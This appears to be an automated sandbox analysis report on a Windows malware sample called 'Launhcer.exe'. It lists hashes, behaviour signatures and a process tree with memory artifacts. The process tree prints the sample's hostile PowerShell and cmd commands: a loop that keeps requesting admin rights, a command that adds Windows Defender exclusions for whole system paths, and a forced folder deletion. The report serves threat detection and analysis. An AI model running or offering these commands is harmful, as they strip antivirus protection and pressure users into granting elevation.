Analysis

  • max time kernel
    92s
  • max time network
    122s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-03-2024 23:27

General

  • Target

    data/appInfo/services/Launhcer.exe

  • Size

    364KB

  • MD5

    e5c00b0bc45281666afd14eef04252b2

  • SHA1

    3b6eecf8250e88169976a5f866d15c60ee66b758

  • SHA256

    542e2ebbded3ef0c43551fb56ce44d4dbb36a507c2a801c0815c79d9f5e0f903

  • SHA512

    2bacd4e1c584565dfd5e06e492b0122860bfc3b0cc1543e6baded490535309834e0d5bb760f65dbfb19a9bb0beddb27a216c605bbed828810a480c8cd1fba387

  • SSDEEP

    6144:+pS9kEFKbITUvR8cy8dzQ7Lcf3Si96sfO+2RZrTql9unNrkYql6wrEJWPYg:+p8KLBzQ7Lcf3SiQs2FTTql9unNrkv75

Score
5/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\Launhcer.exe
    "C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\Launhcer.exe"
    1⤵
    • Checks computer location settings
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:4764
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4104
      • C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\data\Launcher.exe
        "C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\data\Launcher.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1440
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2840
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT
          4⤵
            PID:4052

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      3d086a433708053f9bf9523e1d87a4e8

      SHA1

      b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

      SHA256

      6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

      SHA512

      931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      16KB

      MD5

      282356430967fd5979651e4658574b23

      SHA1

      3425f8af50beeb7c76714a69b2faf1fe64bf8076

      SHA256

      8c0eb2357341abd2d1841090def5f176215ae6ec7c66e3449536e0e286a4167d

      SHA512

      de0e00f6d5fc80ffd1fc33c6adc4dc480711d819a1b3caa41699af025c347773baeb0456a05f9ccfb597be3136f57e87408ffa24291acc381b2fd93dad11b524

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nn4ycrt1.zuh.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/2840-55-0x0000000007990000-0x00000000079A1000-memory.dmp

      Filesize

      68KB

    • memory/2840-50-0x0000000004FF0000-0x0000000005000000-memory.dmp

      Filesize

      64KB

    • memory/2840-38-0x00000000073F0000-0x0000000007422000-memory.dmp

      Filesize

      200KB

    • memory/2840-49-0x0000000007430000-0x000000000744E000-memory.dmp

      Filesize

      120KB

    • memory/2840-62-0x0000000073110000-0x00000000738C0000-memory.dmp

      Filesize

      7.7MB

    • memory/2840-59-0x0000000007A00000-0x0000000007A08000-memory.dmp

      Filesize

      32KB

    • memory/2840-58-0x0000000007A10000-0x0000000007A2A000-memory.dmp

      Filesize

      104KB

    • memory/2840-57-0x00000000079D0000-0x00000000079E4000-memory.dmp

      Filesize

      80KB

    • memory/2840-56-0x00000000079C0000-0x00000000079CE000-memory.dmp

      Filesize

      56KB

    • memory/2840-39-0x000000006FA30000-0x000000006FA7C000-memory.dmp

      Filesize

      304KB

    • memory/2840-54-0x0000000007810000-0x000000000781A000-memory.dmp

      Filesize

      40KB

    • memory/2840-53-0x0000000007DF0000-0x000000000846A000-memory.dmp

      Filesize

      6.5MB

    • memory/2840-51-0x0000000004FF0000-0x0000000005000000-memory.dmp

      Filesize

      64KB

    • memory/2840-26-0x0000000073110000-0x00000000738C0000-memory.dmp

      Filesize

      7.7MB

    • memory/2840-27-0x0000000004FF0000-0x0000000005000000-memory.dmp

      Filesize

      64KB

    • memory/2840-37-0x000000007EE30000-0x000000007EE40000-memory.dmp

      Filesize

      64KB

    • memory/2840-52-0x0000000007650000-0x00000000076F3000-memory.dmp

      Filesize

      652KB

    • memory/4104-23-0x0000000006780000-0x000000000679A000-memory.dmp

      Filesize

      104KB

    • memory/4104-20-0x0000000006260000-0x000000000627E000-memory.dmp

      Filesize

      120KB

    • memory/4104-7-0x00000000052C0000-0x00000000052E2000-memory.dmp

      Filesize

      136KB

    • memory/4104-8-0x0000000005B90000-0x0000000005BF6000-memory.dmp

      Filesize

      408KB

    • memory/4104-25-0x00000000078D0000-0x0000000007E74000-memory.dmp

      Filesize

      5.6MB

    • memory/4104-24-0x00000000067D0000-0x00000000067F2000-memory.dmp

      Filesize

      136KB

    • memory/4104-22-0x0000000007220000-0x00000000072B6000-memory.dmp

      Filesize

      600KB

    • memory/4104-2-0x0000000004CA0000-0x0000000004CD6000-memory.dmp

      Filesize

      216KB

    • memory/4104-21-0x0000000006650000-0x000000000669C000-memory.dmp

      Filesize

      304KB

    • memory/4104-6-0x0000000004DB0000-0x0000000004DC0000-memory.dmp

      Filesize

      64KB

    • memory/4104-19-0x0000000005D70000-0x00000000060C4000-memory.dmp

      Filesize

      3.3MB

    • memory/4104-4-0x0000000004DB0000-0x0000000004DC0000-memory.dmp

      Filesize

      64KB

    • memory/4104-9-0x0000000005C00000-0x0000000005C66000-memory.dmp

      Filesize

      408KB

    • memory/4104-63-0x0000000073110000-0x00000000738C0000-memory.dmp

      Filesize

      7.7MB

    • memory/4104-64-0x0000000004DB0000-0x0000000004DC0000-memory.dmp

      Filesize

      64KB

    • memory/4104-66-0x0000000004DB0000-0x0000000004DC0000-memory.dmp

      Filesize

      64KB

    • memory/4104-5-0x00000000053F0000-0x0000000005A18000-memory.dmp

      Filesize

      6.2MB

    • memory/4104-3-0x0000000073110000-0x00000000738C0000-memory.dmp

      Filesize

      7.7MB

    • memory/4104-70-0x0000000073110000-0x00000000738C0000-memory.dmp

      Filesize

      7.7MB